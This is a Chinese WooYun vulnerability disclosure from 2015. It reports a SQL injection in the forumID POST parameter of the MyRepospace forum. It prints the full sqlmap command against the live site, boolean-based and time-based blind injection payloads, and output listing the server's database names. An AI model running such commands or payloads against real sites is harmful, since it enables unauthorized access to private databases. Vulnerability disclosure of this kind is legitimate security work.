当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-090059

漏洞标题:MyRepospace(cydia第三方源仓库)某处SQL注射漏洞或读取库内敏感数据

相关厂商:MyRepospace

漏洞作者: 路人甲

提交时间:2015-01-05 14:37

修复时间:2015-02-19 14:38

公开时间:2015-02-19 14:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-05: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-02-19: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

MyRepospace某处SQL注射漏洞或读取库内敏感数据

详细说明:

https://www.myrepospace.com/forums/index.php
POST
forumID=2&page=1
forumID存在SQL注射

漏洞证明:

sqlmap>python sqlmap.py -u "https://www.myrepospace.com/forums/index.php" --data "forumID
=2&page=1" -p forumID --dbms=mysql --threads 5 --dbs
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20141211}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user'
s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 14:18:18
[14:18:19] [INFO] testing connection to the target URL
[14:18:20] [INFO] heuristics detected web page charset 'utf-8'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: forumID (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: forumID=2' AND 5715=5715 AND 'wLkE'='wLkE&page=1
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: forumID=2' AND SLEEP(5) AND 'quFc'='quFc&page=1
---
[14:18:20] [INFO] testing MySQL
[14:18:22] [WARNING] reflective value(s) found and filtering out
[14:18:22] [INFO] confirming MySQL
[14:18:25] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.23, Apache
back-end DBMS: MySQL >= 5.0.0
[14:18:25] [INFO] fetching database names
[14:18:25] [INFO] fetching number of databases
[14:18:25] [INFO] retrieved:
[14:18:28] [INFO] heuristics detected web page charset 'ascii'
4
[14:18:33] [INFO] retrieving the length of query output
[14:18:33] [INFO] retrieved: 18
[14:19:43] [INFO] retrieved: information_schema
[14:19:43] [INFO] retrieving the length of query output
[14:19:43] [INFO] retrieved: 18
[14:20:55] [INFO] retrieved: myreposp_beta_repo
[14:20:55] [INFO] retrieving the length of query output
[14:20:55] [INFO] retrieved: 14
[14:21:54] [INFO] retrieved: myreposp_forum
[14:21:54] [INFO] retrieving the length of query output
[14:21:54] [INFO] retrieved: 13
[14:22:52] [INFO] retrieved: myreposp_main
available databases [4]:
[*] information_schema
[*] myreposp_beta_repo
[*] myreposp_forum
[*] myreposp_main

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝